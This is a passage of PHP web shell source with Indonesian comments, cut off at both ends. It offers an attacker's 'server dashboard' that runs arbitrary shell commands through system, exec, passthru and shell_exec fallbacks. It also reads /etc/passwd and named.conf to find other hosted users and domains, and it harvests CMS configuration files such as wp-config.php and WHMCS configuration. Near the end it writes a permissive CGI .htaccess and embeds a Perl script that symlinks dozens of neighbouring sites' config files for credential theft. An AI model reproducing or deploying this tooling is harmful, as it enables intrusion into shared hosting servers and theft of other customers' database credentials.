['includes/config.php'], 'WordPress' => ['wp-config.php'], 'Joomla' => ['configuration.php'], 'WHMCS' => ['configuration.php'], 'Lokomedia' => ['conf/configuration.php'], 'Drupal' => ['sites/default/settings.php'], 'Magento' => ['app/etc/local.xml', 'app/etc/env.php'], 'PrestaShop' => ['config/settings.inc.php'], 'OpenCart' => ['config.php', 'admin/config.php'], 'Laravel' => ['.env', 'config/app.php'] ]; return $cmsConfigs; } $foundConfigs = []; foreach ($configFiles as $file) { if (is_readable($file)) { if (is_dir($file)) { // Jika berupa direktori, scan isinya $files = recursiveScan($file, ['conf', 'config', 'properties', 'ini', 'xml']); $foundConfigs = array_merge($foundConfigs, $files); } elseif (is_file($file)) { $foundConfigs[] = $file; } } } return $foundConfigs; } // Fungsi untuk mendeteksi CMS function detectCMS($directory) { $cmsConfigs = grabConfig('cms'); $detected = []; foreach ($cmsConfigs as $cms => $configs) { foreach ($configs as $config) { $configPath = $directory . '/' . $config; if (file_exists($configPath) && is_readable($configPath)) { $detected[$cms] = $configPath; break; } } } return $detected; } // Fungsi recursive directory scan tanpa shell commands function recursiveScan($directory, $extensions = [], $maxDepth = 10, $currentDepth = 0) { if ($currentDepth >= $maxDepth) { return []; } $files = []; if (!is_dir($directory) || !is_readable($directory)) { return $files; } try { $items = scandir($directory); foreach ($items as $item) { if ($item == '.' || $item == '..') continue; $path = $directory . '/' . $item; if (is_dir($path)) { // Recursive untuk subdirectory $subFiles = recursiveScan($path, $extensions, $maxDepth, $currentDepth + 1); $files = array_merge($files, $subFiles); } elseif (is_file($path) && is_readable($path)) { // Filter berdasarkan ekstensi jika diberikan if (empty($extensions)) { $files[] = $path; } else { $ext = pathinfo($path, PATHINFO_EXTENSION); if (in_array(strtolower($ext), $extensions)) { $files[] = $path; } } } } } catch (Exception $e) { // Silent error } return $files; } // Fungsi untuk membaca /etc/passwd function readEtcPasswd() { $users = []; if (is_readable('/etc/passwd')) { $passwd = file_get_contents('/etc/passwd'); if (preg_match_all('/([^:]+):x:/', $passwd, $matches)) { $users = $matches[1]; } } return $users; } // Fungsi untuk mencari user directories function findUserDirectories($pattern = null) { $users = readEtcPasswd(); $userDirs = []; foreach ($users as $user) { $possiblePaths = [ "/home/{$user}/public_html", "/home/{$user}", "/var/www/{$user}", "/usr/home/{$user}", "/hsphere/local/home/{$user}" ]; foreach ($possiblePaths as $path) { if (is_dir($path) && is_readable($path)) { if ($pattern === null || preg_match($pattern, $path)) { $userDirs[$user] = $path; break; } } } } return $userDirs; } // Fungsi untuk membaca domain dari named.conf function readDomainsFromNamedConf() { $domains = []; if (is_readable('/etc/named.conf')) { $namedConf = file_get_contents('/etc/named.conf'); if (preg_match_all('#/var/named/(.*?)\.db#', $namedConf, $matches)) { $domains = $matches[1]; } } return $domains; } // Fungsi untuk membaca domain dari valiases function readDomainsFromValiases($user) { $domains = []; $valiasesPath = "/etc/valiases/{$user}"; if (is_readable($valiasesPath)) { $content = file_get_contents($valiasesPath); if (preg_match_all('/\S+/', $content, $matches)) { $domains = $matches[0]; } } return $domains; } // Fungsi write file dengan berbagai metode function writeFile($file, $content, $mode = 'w') { // Coba menggunakan file_put_contents if (function_exists('file_put_contents')) { $result = @file_put_contents($file, $content); if ($result !== false) { return true; } } // Coba menggunakan fopen + fwrite if (function_exists('fopen') && function_exists('fwrite')) { $handle = @fopen($file, $mode); if ($handle) { $result = @fwrite($handle, $content); @fclose($handle); return $result !== false; } } return false; } // Fungsi read file dengan berbagai metode function readFileContent($file) { // Coba menggunakan file_get_contents if (function_exists('file_get_contents') && is_readable($file)) { $content = @file_get_contents($file); if ($content !== false) { return $content; } } // Coba menggunakan fopen + fread if (function_exists('fopen') && function_exists('fread') && is_readable($file)) { $handle = @fopen($file, 'r'); if ($handle) { $content = ''; while (!feof($handle)) { $content .= @fread($handle, 8192); } @fclose($handle); return $content; } } // Coba menggunakan highlight_file (untuk file PHP) if (function_exists('highlight_file') && is_readable($file)) { ob_start(); @highlight_file($file); $content = ob_get_clean(); if ($content) { return $content; } } return false; } // Fungsi copy dengan fallback function copyFile($source, $destination) { if (function_exists('copy')) { return @copy($source, $destination); } // Fallback manual copy if (is_readable($source)) { $content = readFileContent($source); if ($content !== false) { return writeFile($destination, $content); } } return false; } // Fungsi unarchive (extract) file function unarchiveFile($archiveFile, $extractTo = null) { if (!is_file($archiveFile) || !is_readable($archiveFile)) { return false; } if ($extractTo === null) { $extractTo = dirname($archiveFile); } $ext = strtolower(pathinfo($archiveFile, PATHINFO_EXTENSION)); // Cek ekstensi yang didukung $supported = ['zip', 'tar', 'gz', 'bz2', 'rar']; if (!in_array($ext, $supported)) { return false; } // Coba menggunakan ZipArchive untuk .zip if ($ext == 'zip' && class_exists('ZipArchive')) { $zip = new ZipArchive(); if ($zip->open($archiveFile) === TRUE) { $result = $zip->extractTo($extractTo); $zip->close(); return $result; } } // Coba menggunakan PharData untuk .tar, .tar.gz, .tar.bz2 if (($ext == 'tar' || $ext == 'gz' || $ext == 'bz2') && class_exists('PharData')) { try { $phar = new PharData($archiveFile); $phar->extractTo($extractTo); return true; } catch (Exception $e) { return false; } } // Coba menggunakan shell commands sebagai fallback if (function_exists('shell_exec')) { $cmd = ''; if ($ext == 'zip') { $cmd = "unzip -q '{$archiveFile}' -d '{$extractTo}' 2>/dev/null"; } elseif ($ext == 'tar') { $cmd = "tar -xf '{$archiveFile}' -C '{$extractTo}' 2>/dev/null"; } elseif ($ext == 'gz') { $cmd = "tar -xzf '{$archiveFile}' -C '{$extractTo}' 2>/dev/null"; } elseif ($ext == 'bz2') { $cmd = "tar -xjf '{$archiveFile}' -C '{$extractTo}' 2>/dev/null"; } elseif ($ext == 'rar') { $cmd = "unrar x '{$archiveFile}' '{$extractTo}/' 2>/dev/null"; } if ($cmd) { @shell_exec($cmd); return is_dir($extractTo); } } return false; } // Fungsi untuk menampilkan syntax highlighting function highlightFileContent($file) { if (!is_file($file) || !is_readable($file)) { return false; } $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION)); // Hanya file yang bisa di-highlight $highlightable = ['php', 'html', 'htm', 'js', 'css', 'txt', 'json', 'xml', 'sql', 'conf', 'config']; if (!in_array($ext, $highlightable)) { return htmlspecialchars(readFileContent($file)); } // Coba menggunakan highlight_file untuk PHP if ($ext == 'php' && function_exists('highlight_file')) { ob_start(); @highlight_file($file); return ob_get_clean(); } // Untuk file lainnya, gunakan highlight_string atau manual highlighting $content = readFileContent($file); if ($content === false) { return false; } $content = htmlspecialchars($content); // Manual highlighting sederhana berdasarkan tipe file switch($ext) { case 'html': case 'htm': $content = preg_replace('/<(\/?)([a-zA-Z][a-zA-Z0-9]*)/', '<$1$2', $content); $content = preg_replace('/<!--(.*?)-->/', '<!--$1-->', $content); break; case 'js': $keywords = ['function', 'var', 'let', 'const', 'if', 'else', 'for', 'while', 'return', 'true', 'false', 'null', 'undefined']; foreach ($keywords as $keyword) { $content = preg_replace('/\b' . $keyword . '\b/', '' . $keyword . '', $content); } break; case 'css': $content = preg_replace('/([^{}]+)\{/', '$1{', $content); $content = preg_replace('/\b([a-zA-Z-]+)\s*:/', '$1:', $content); break; case 'conf': case 'config': $content = preg_replace('/^(\s*)([a-zA-Z_][a-zA-Z0-9_]*)\s*=/m', '$1$2 =', $content); break; } return '
' . $content . '
'; } // Fungsi untuk mendeteksi file archive di direktori function detectArchiveFiles($directory) { $archiveExtensions = ['zip', 'tar', 'gz', 'bz2', 'rar', '7z', 'tgz', 'tbz2']; $archives = []; if (!is_dir($directory) || !is_readable($directory)) { return $archives; } $items = @scandir($directory); if (!$items) return $archives; foreach ($items as $item) { if ($item == '.' || $item == '..') continue; $path = $directory . '/' . $item; if (is_file($path)) { $ext = strtolower(pathinfo($item, PATHINFO_EXTENSION)); if (in_array($ext, $archiveExtensions)) { $size = formatSize($path); $archives[] = [ 'name' => $item, 'path' => $path, 'size' => $size, 'ext' => $ext ]; } } } return $archives; } // Fungsi bing search (simulasi) function bing($query) { $query = urlencode($query); $url = "https://www.bing.com/search?q={$query}&count=50"; $ch = curl_init(); curl_setopt_array($ch, [ CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' ]); $html = curl_exec($ch); curl_close($ch); if (!$html) return ''; preg_match_all('/ ]+)/i', $html, $matches); $domains = []; if (!empty($matches[1])) { foreach ($matches[1] as $host) { $host = strtolower($host); $host = preg_replace('/^www\./', '', $host); if (!in_array($host, $domains)) { $domains[] = $host; } } } return implode("\n", $domains); } // ========== FUNGSI LAMA ========== function detectOS() { if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { return "Windows"; } else { return "Linux"; } } function formatSize($file) { if (!file_exists($file) || !is_readable($file)) return 'N/A'; $bytes = filesize($file); if ($bytes == 0) return '0 B'; $sizes = ['B', 'KB', 'MB', 'GB', 'TB']; $factor = floor((strlen($bytes) - 1) / 3); return sprintf("%.2f", $bytes / pow(1024, $factor)) . " " . $sizes[$factor]; } function exe($cmd) { if(is_file($cmd)) { $buff = @file_get_contents($cmd); return htmlspecialchars($buff); } if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return htmlspecialchars($buff); } elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result) { $buff .= $result; } return htmlspecialchars($buff); } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('shell_exec')) { $buff = @shell_exec($cmd); return htmlspecialchars($buff); } return false; } function deleteDirectory($dir) { if (!is_dir($dir)) return false; $files = array_diff(scandir($dir), array('.', '..')); foreach ($files as $file) { $filePath = "$dir/$file"; is_dir($filePath) ? deleteDirectory($filePath) : unlink($filePath); } return rmdir($dir); } function w($dir,$perm) { if(!is_writable($dir)) { return ''.$perm.''; } else { return ''.$perm.''; } } function r($dir,$perm) { if(!is_readable($dir)) { return ''.$perm.''; } else { return ''.$perm.''; } } function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { $info = 'p'; } else { $info = 'u'; } $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } function hdd($s) { if($s >= 1073741824) return sprintf('%1.2f',$s / 1073741824 ).' GB'; elseif($s >= 1048576) return sprintf('%1.2f',$s / 1048576 ) .' MB'; elseif($s >= 1024) return sprintf('%1.2f',$s / 1024 ) .' KB'; else return $s .' B'; } if(isset($_GET['dir'])) { $dir = $_GET['dir']; @chdir($dir); } else { $dir = getcwd(); } function checkStatus($condition) { return $condition ? 'ON' : 'OFF'; } function getMyIP() { $ch = curl_init('https://api64.ipify.org'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $ip = curl_exec($ch); curl_close($ch); return $ip ? $ip : 'Tidak Diketahui'; } $os = detectOS(); $kernel = php_uname(); $server_ip = gethostbyname($_SERVER['HTTP_HOST']); $ip_user = getMyIP(); $dir = str_replace("\\","/",$dir); $scdir = explode("/", $dir); $freespace = hdd(disk_free_space("/")); $total = hdd(disk_total_space("/")); $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? 'ON' : 'OFF'; $ds = @ini_get("disable_functions"); $curl = (function_exists('curl_version')) ? 'ON' : 'OFF'; $wget = (exe('wget --help')) ? 'ON' : 'OFF'; $perl = (exe('perl --help')) ? 'ON' : 'OFF'; $python = (exe('python --help')) ? 'ON' : 'OFF'; $show_ds = (!empty($ds)) ? $ds: "NONE"; if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } // ========== PENAMBAHAN TAB BARU ========== $additional_tabs = [ 'home' => ' Home', 'fileops' => ' File Operations', 'jumping' => ' Jumping', 'grab' => ' Grab Config', 'scan' => ' Recursive Scan', 'archive' => ' Archive Tools' ]; // Header Section echo '

Server Dashboard

'.$_SERVER['HTTP_HOST'].'
OS: '.$os.'
Server IP: '.$server_ip.'
User: '.$user.'
Free Space: '.$freespace.' / '.$total.'
Safe Mode: '.$sm.'
Your IP: '.$_SERVER['REMOTE_ADDR'].'
'; // Navigation Tabs echo '
'; // ========== PENANGANAN TAB BARU ========== // Tab Home - DIPERBAIKI (Default current dir + Common Directories) if($_GET['do'] == 'home') { echo '
Home Directory & Common Directories
'; // Current Directory Info echo '
Current Directory: '.$dir.'
Permissions: '.w($dir, perms($dir)).'
'; // Current Directory Contents echo '
Current Directory Contents
'; if(is_dir($dir) && is_readable($dir)) { $items = @scandir($dir); if($items) { echo '
'; $count = 0; foreach($items as $item) { if($item == '.' || $item == '..') continue; $count++; if($count > 20) { echo '
... and more
'; break; } $full_path = $dir . '/' . $item; $is_dir = is_dir($full_path); $icon = $is_dir ? 'bi-folder-fill text-warning' : 'bi-file-earmark text-info'; $size = $is_dir ? 'DIR' : ''.formatSize($full_path).''; echo '
'.htmlspecialchars($item).'
'.($is_dir ? ' ' : ' ' ).' '.$size.'
'; } echo '
'; // Show total count $total_items = count($items) - 2; // subtract . and .. echo '
Showing '.min(20, $total_items).' of '.$total_items.' items
'; } else { echo '
Cannot scan directory
'; } } else { echo '
Cannot read current directory
'; } echo '
'; // Common Directories echo '
Common Directories
'; $common_dirs = [ '/' => ['Root Directory', 'bi-hdd'], '/home' => ['Home Directory', 'bi-house-door'], '/home/'.$user => ['User Home', 'bi-person'], '/home/'.$user.'/public_html' => ['Public HTML', 'bi-globe'], '/var/www/html' => ['Apache Root', 'bi-server'], '/var/www' => ['Web Directory', 'bi-folder'], '/tmp' => ['Temp Directory', 'bi-clock'], '/etc' => ['System Configuration', 'bi-gear'], '/usr/local' => ['Local Programs', 'bi-terminal'], '/opt' => ['Optional Software', 'bi-box'], '/root' => ['Root Home', 'bi-person-check'], '/proc' => ['Process Info', 'bi-diagram-3'], '/sys' => ['System Info', 'bi-cpu'], '/dev' => ['Device Files', 'bi-device-hdd'], '/mnt' => ['Mount Points', 'bi-usb-drive'], '/media' => ['Removable Media', 'bi-usb-plug'], '/srv' => ['Service Data', 'bi-hdd-stack'], '/boot' => ['Boot Files', 'bi-power'], '/lib' => ['System Libraries', 'bi-book'], '/bin' => ['System Binaries', 'bi-terminal'], '/sbin' => ['System Admin Binaries', 'bi-terminal-fill'], '/usr/bin' => ['User Binaries', 'bi-terminal'], '/usr/sbin' => ['User Admin Binaries', 'bi-terminal-fill'], '/usr/local/bin' => ['Local User Binaries', 'bi-terminal'], '/usr/local/sbin' => ['Local Admin Binaries', 'bi-terminal-fill'], '/var/log' => ['Log Files', 'bi-journal-text'], '/var/tmp' => ['Variable Temp', 'bi-clock-history'], '/var/run' => ['Runtime Data', 'bi-play-circle'], '/var/lock' => ['Lock Files', 'bi-lock'], '/var/spool' => ['Spool Directory', 'bi-printer'], '/var/mail' => ['Mail Directory', 'bi-envelope'], '/var/cache' => ['Cache Files', 'bi-lightning'] ]; echo '
'; foreach($common_dirs as $path => $dir_info) { list($desc, $icon_class) = $dir_info; if(is_dir($path) && is_readable($path)) { // Get directory info $item_count = 0; $size_info = 'DIR'; if($handle = @opendir($path)) { while(false !== ($entry = readdir($handle))) { if($entry != '.' && $entry != '..') { $item_count++; } } closedir($handle); } $permissions = perms($path); $writable = is_writable($path); $perm_badge = $writable ? 'W' : 'R'; echo '
'.$desc.' '.$perm_badge.'
'.$item_count.' items
'.$path.' '.$permissions.'
'; } else { echo '
'.$desc.' N/A
'.$path.' (Not accessible)
'; } } echo '
'; // Directory stats $accessible_count = 0; foreach($common_dirs as $path => $dir_info) { if(is_dir($path) && is_readable($path)) { $accessible_count++; } } echo '
'.$accessible_count.'
Accessible
'.(count($common_dirs) - $accessible_count).'
Inaccessible
'; echo '
'; // JavaScript untuk filter directories echo ''; } // Tab File Operations (dipindahkan dari Archive Tools) elseif($_GET['do'] == 'fileops') { echo '
File Operations
'; echo '
'; // File Operations echo '
File Operations
'; if(isset($_POST['do_file_op'])) { $source = $_POST['source_file']; $dest = $_POST['dest_file']; $operation = $_POST['file_op']; echo '
'; switch($operation) { case 'copy': if(copyFile($source, $dest)) { echo '
File copied successfully from '.$source.' to '.$dest.'
'; } else { echo '
Failed to copy file
'; } break; case 'read': $content = readFileContent($source); if($content !== false) { echo '
File content read successfully
'
                            .htmlspecialchars(substr($content, 0, 5000)).'
'; } else { echo '
Cannot read file or file not found
'; } break; case 'write': $content = $_POST['file_content'] ?? ''; if(writeFile($dest, $content)) { echo '
File written successfully to '.$dest.'
'; } else { echo '
Failed to write file
'; } break; case 'highlight': $highlighted = highlightFileContent($source); if($highlighted !== false) { echo '
File highlighted successfully
'.$highlighted.'
'; } else { echo '
Cannot highlight file
'; } break; } echo '
'; } echo ''; echo '
'; // Quick File Tools echo '
Quick File Tools
Create New File Create New Folder
File Functions Status:
file_get_contents: '.(function_exists('file_get_contents') ? 'Available' : 'Not Available').'
fopen/fread: '.(function_exists('fopen') && function_exists('fread') ? 'Available' : 'Not Available').'
highlight_file: '.(function_exists('highlight_file') ? 'Available' : 'Not Available').'
'; echo '
'; // Modals untuk find files echo ' '; } // Tab Jumping - DIPERBAIKI elseif($_GET['do'] == 'jumping') { $i = 0; echo "
"; // Check for HSphere if(preg_match("/hsphere/", $dir)) { echo '
HSphere Jumping
'; $urls = explode("\r\n", $_POST['url'] ?? ''); if(isset($_POST['jump'])) { echo "
Searching in HSphere...
"; foreach($urls as $url) { if(empty(trim($url))) continue; $url = str_replace(array("http://","www."), "", strtolower($url)); $etc = "/etc/passwd"; $f = fopen($etc,"r"); if($f) { while($gets = fgets($f)) { $pecah = explode(":", $gets); $user = $pecah[0]; $dir_user = "/hsphere/local/home/$user"; if(is_dir($dir_user) === true) { $url_user = $dir_user."/".$url; if(is_readable($url_user)) { $i++; $status = is_writable($url_user) ? 'RW' : 'R'; echo ""; } } } fclose($f); } } echo "
Status Path Actions
{$status} {$url_user} Open
"; if($i == 0) { echo '
No accessible directories found
'; } else { echo '
Total ada '.$i.' Kamar di '.$server_ip.'
'; } } else { // Show domain list from HSphere echo '
'; } echo '
'; } // Check for vHosts elseif(preg_match("/vhosts|vhost/", $dir)) { echo '
vHosts Jumping
'; preg_match("/\/var\/www\/(.*?)\//", $dir, $vh); $urls = explode("\r\n", $_POST['url'] ?? ''); if(isset($_POST['jump'])) { echo "
Searching in vHosts...
"; foreach($urls as $url) { if(empty(trim($url))) continue; $url = str_replace("www.", "", $url); $web_vh = "/var/www/".($vh[1] ?? 'unknown')."/$url/httpdocs"; if(is_dir($web_vh) === true && is_readable($web_vh)) { $i++; $status = is_writable($web_vh) ? 'RW' : 'R'; echo ""; } } echo "
Status Domain Path Actions
{$status} {$url} {$web_vh} Open
"; if($i == 0) { echo '
No accessible vHosts directories found
'; } else { echo '
Total ada '.$i.' Kamar di '.$server_ip.'
'; } } else { // Show domain list from Bing echo '
'; } echo '
'; } // Default /etc/passwd scanning else { echo '
User Directory Jumping
'; echo "
Scanning /etc/passwd for user directories...
"; $etc = fopen("/etc/passwd", "r"); if(!$etc) { echo '
Can\'t read /etc/passwd
'; } else { echo '
'; while($passwd = fgets($etc)) { if(preg_match_all('/(.*?):x:/', $passwd, $user_jumping)) { foreach($user_jumping[1] as $user_idx_jump) { $user_jumping_dir = "/home/$user_idx_jump/public_html"; if(is_readable($user_jumping_dir)) { $i++; $status = is_writable($user_jumping_dir) ? 'RW' : 'R'; // Try to get domain $domain_info = ""; if(function_exists('posix_getpwuid')) { $domain_jump = @file_get_contents("/etc/named.conf"); if($domain_jump) { preg_match_all("#/var/named/(.*?)\.db#", $domain_jump, $domains_jump); foreach($domains_jump[1] as $dj) { $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj")); if($user_jumping_url && $user_jumping_url['name'] == $user_idx_jump) { $domain_info = "{$dj}"; break; } } } if(empty($domain_info)) { $domain_info = 'No domain'; } } else { $domain_info = 'posix not available'; } echo ""; } } } } fclose($etc); echo "
User Status Directory Domain Actions
{$user_idx_jump} {$status} {$user_jumping_dir} {$domain_info} Open
"; if($i == 0) { echo '
No user directories found with public_html
'; } else { echo '
Total ada '.$i.' Kamar di '.$server_ip.'
'; } } echo '
'; } echo ""; } // Tab Grab Config - DIPERBAIKI elseif($_GET['do'] == 'grab') { echo '
Grab Configuration Files
'; // Buat direktori pbm_config $config_dir = $dir . "/pbm_config"; @mkdir($config_dir, 0777, true); // Buat file .htaccess untuk konfigurasi $htaccess_content = "Options FollowSymLinks MultiViews Indexes ExecCGI\nRequire None\nSatisfy Any\nAddType application/x-httpd-cgi .cin\nAddHandler cgi-script .cin\nAddHandler cgi-script .cin"; $htaccess_file = $config_dir . "/.htaccess"; @file_put_contents($htaccess_file, $htaccess_content); // Cek jika berada di vhosts if(preg_match("/vhosts|vhost/", $dir)) { echo '
vHosts Directory Detected: '.$dir.'
'; $link_config = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir); // Buat file vhost.cin (Perl script untuk symlink) $vhost_script = '#!/usr/bin/perl -I/usr/local/bandmin opendir(my $dir , "/var/www/vhosts/"); foreach(sort readdir $dir) { my $isDir = 0; $isDir = 1 if -d $_; $sitess = $_; if($isDir && $sitess !~ /^\./) { # Buat symlink untuk berbagai konfigurasi CMS symlink("/var/www/vhosts/$sitess/httpdocs/includes/configure.php", "$sitess-shop.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/os/includes/configure.php", "$sitess-shop-os.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/oscom/includes/configure.php", "$sitess-oscom.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/oscommerce/includes/configure.php", "$sitess-oscommerce.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/oscommerces/includes/configure.php", "$sitess-oscommerces.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/shop/includes/configure.php", "$sitess-shop2.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/shopping/includes/configure.php", "$sitess-shop-shopping.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/sale/includes/configure.php", "$sitess-sale.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/amember/config.inc.php", "$sitess-amember.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/config.inc.php", "$sitess-amember2.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/members/configuration.php", "$sitess-members.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/config.php", "$sitess-4images1.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/forum/includes/config.php", "$sitess-forum.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/forums/includes/config.php", "$sitess-forums.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/admin/conf.php", "$sitess-5.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/admin/config.php", "$sitess-4.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/wp-config.php", "$sitess-Wordpress.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/wp/wp-config.php", "$sitess-Wordpress.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/WP/wp-config.php", "$sitess-Wordpress.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/beta/wp-config.php", "$sitess-Wordpress.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/beta/wp-config.php", "$sitess-Wordpress.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/press/wp-config.php", "$sitess-wp13-press.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/wordpress/wp-config.php", "$sitess-wordpress.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/Wordpress/wp-config.php", "$sitess-Wordpress.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/blog/wp-config.php", "$sitess-Wordpress.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/wordpress/beta/wp-config.php", "$sitess-Wordpress.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/news/wp-config.php", "$sitess-Wordpress-news.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/new/wp-config.php", "$sitess-Wordpress-new.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/blog/wp-config.php", "$sitess-Wordpress-blog.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/beta/wp-config.php", "$sitess-Wordpress-beta.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/blogs/wp-config.php", "$sitess-Wordpress-blogs.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/home/wp-config.php", "$sitess-Wordpress-home.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/portal/wp-config.php", "$sitess-Wordpress-portal.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/site/wp-config.php", "$sitess-Wordpress-site.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/main/wp-config.php", "$sitess-Wordpress-main.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/test/wp-config.php", "$sitess-Wordpress-test.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/arcade/functions/dbclass.php", "$sitess-ibproarcade.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/joomla/configuration.php", "$sitess-joomla2.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/portal/configuration.php", "$sitess-joomla-portal.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/joo/configuration.php", "$sitess-joo.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/cms/configuration.php", "$sitess-joomla-cms.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/site/configuration.php", "$sitess-joomla-site.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/main/configuration.php", "$sitess-joomla-main.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/news/configuration.php", "$sitess-joomla-news.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/new/configuration.php", "$sitess-joomla-new.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/home/configuration.php", "$sitess-joomla-home.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/vb/includes/config.php", "$sitess-vb~config.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/vb3/includes/config.php", "$sitess-vb3~config.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/cc/includes/config.php", "$sitess-vb1~config.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/forum/includes/class_core.php", "$sitess-vbluttin~class_core.php.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/vb/includes/class_core.php", "$sitess-vbluttin~class_core.php1.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/cc/includes/class_core.php", "$sitess-vbluttin~class_core.php2.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/whm/configuration.php", "$sitess-whm15.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/central/configuration.php", "$sitess-whm-central.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/whm/whmcs/configuration.php", "$sitess-whm-whmcs.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/whm/WHMCS/configuration.php", "$sitess-whm-WHMCS.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/whmc/WHM/configuration.php", "$sitess-whmc-WHM.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/whmcs/configuration.php", "$sitess-whmcs.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/support/configuration.php", "$sitess-support.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/supp/configuration.php", "$sitess-supp.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/secure/configuration.php", "$sitess-sucure.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/secure/whm/configuration.php", "$sitess-sucure-whm.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/secure/whmcs/configuration.php", "$sitess-sucure-whmcs.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/cpanel/configuration.php", "$sitess-cpanel.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/panel/configuration.php", "$sitess-panel.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/host/configuration.php", "$sitess-host.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/hosting/configuration.php", "$sitess-hosting.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/hosts/configuration.php", "$sitess-hosts.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/configuration.php", "$sitess-joomla.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/submitticket.php", "$sitess-whmcs2.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/clients/configuration.php", "$sitess-clients.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/client/configuration.php", "$sitess-client.txt"); 